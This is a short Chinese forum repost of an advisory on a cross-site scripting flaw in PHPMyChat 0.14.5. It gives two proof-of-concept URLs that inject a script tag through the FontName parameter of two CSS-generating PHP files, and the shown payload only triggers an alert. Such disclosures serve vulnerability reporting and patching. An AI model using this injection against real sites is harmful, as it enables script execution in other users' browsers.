[转载]PHPHeaven PHPMyChat跨站脚本执行漏洞及测试方法
信息来源:[url]www.phpheaven.net[/url]Vulnerable versions: PHPMyChat 0.14.5
Proof of concept:
[url]http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert[/url](test);</script>
[url]http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert[/url](test);</script>
页:
[1]